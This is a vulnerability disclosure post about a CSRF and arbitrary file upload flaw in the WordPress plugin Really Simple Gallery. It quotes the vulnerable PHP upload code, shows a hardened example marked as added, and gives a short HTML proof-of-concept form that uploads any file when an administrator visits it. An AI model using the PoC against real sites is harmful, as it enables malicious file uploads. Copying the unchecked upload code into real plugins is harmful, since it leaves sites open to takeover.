13 Mar

Cross-Site Request Forgery (CSRF)/Arbitrary File Upload Vulnerability in Really Simple Gallery

While looking into a report of a reflected cross-site scripting vulnerability in the plugin Really Simple Gallery, we noticed that it also contains a cross-site request forgery (CSRF)/arbitrary file upload vulnerability.

When uploading a file through the plugin’s settings page, there is no check for a valid nonce to protect against CSRF, as seen in the file /reallysimplegallery.php starting on line 90:

if(isset($_POST["addImage"])){
    $target_path = get_option("simple_gallery_uploads");
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);

    echo '<div id="setting-error-settings_updated" class="updated settings-error"><p><strong>';

    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

While the file being uploaded is supposed to be an image, there is no restriction on what type of file can be uploaded.
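For comparison, here is an added example (not the plugin's code) of how the same upload branch could be written with the checks the snippet above lacks: a capability check, a nonce check, and a file type check, using WordPress's own upload handling. The nonce action name `rsg_add_image`, the nonce field name `rsg_nonce`, and the function names are assumptions for illustration.

```php
<?php
// Added example, not code from Really Simple Gallery. Runs inside a WordPress
// admin page, where wp-admin/includes/file.php (wp_handle_upload) is already loaded.

// Settings-page form: the hidden nonce field is what the original form lacked.
function rsg_render_upload_form() {
    echo '<form method="post" enctype="multipart/form-data">';
    wp_nonce_field( 'rsg_add_image', 'rsg_nonce' ); // assumed action/field names
    echo '<input type="file" name="uploadedfile" />';
    echo '<input type="submit" name="addImage" value="Submit" />';
    echo '</form>';
}

// POST handler: returns the stored file path, or a WP_Error on any failure.
function rsg_handle_upload() {
    if ( ! isset( $_POST['addImage'] ) ) {
        return new WP_Error( 'rsg_noop', 'No upload requested.' );
    }
    // 1. Capability check: only users permitted to upload files get this far.
    if ( ! current_user_can( 'upload_files' ) ) {
        return new WP_Error( 'rsg_cap', 'Insufficient permissions.' );
    }
    // 2. CSRF check: check_admin_referer() stops the request when the nonce is
    //    missing or stale, so a form submitted from another site is rejected.
    check_admin_referer( 'rsg_add_image', 'rsg_nonce' );

    if ( empty( $_FILES['uploadedfile']['tmp_name'] ) ) {
        return new WP_Error( 'rsg_nofile', 'No file received.' );
    }
    // 3. Type check: accept only image types, verified against the file's
    //    content and extension together, not just the client-supplied name.
    $allowed = array( 'jpg|jpeg|jpe' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif' );
    $check   = wp_check_filetype_and_ext(
        $_FILES['uploadedfile']['tmp_name'],
        $_FILES['uploadedfile']['name'],
        $allowed
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        return new WP_Error( 'rsg_type', 'Only JPEG, PNG and GIF images are accepted.' );
    }
    // 4. Store via wp_handle_upload(): it sanitises the file name, avoids
    //    collisions and places the file under the uploads directory, instead of
    //    move_uploaded_file() to a path built from basename() of user input.
    $result = wp_handle_upload( $_FILES['uploadedfile'], array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $result['error'] ) ) {
        return new WP_Error( 'rsg_upload', $result['error'] );
    }
    return $result['file'];
}
```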

We couldn’t find a contact for the developer, so we are notifying the WordPress.org Plugin Directory of the issue.

Proof of Concept

The following proof of concept will cause the chosen file to be uploaded to the directory /wp-content/plugins/really-simple-gallery/uploads/ on the website, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=my-unique-identifier" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadedfile" />
<input type="submit" name="addImage" value="Submit" />
</form>
</body>
</html>

Timeline

  • 3/13/2017 – WordPress.org Plugin Directory notified.
  • 3/13/2017 – Removed from WordPress.org Plugin Directory.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us, we review the plugin for issues that hackers would exploit if they knew about them, as well as making sure that the needed security checks have been implemented in the plugin. If you order two reviews you will receive a free lifetime subscription to our service.
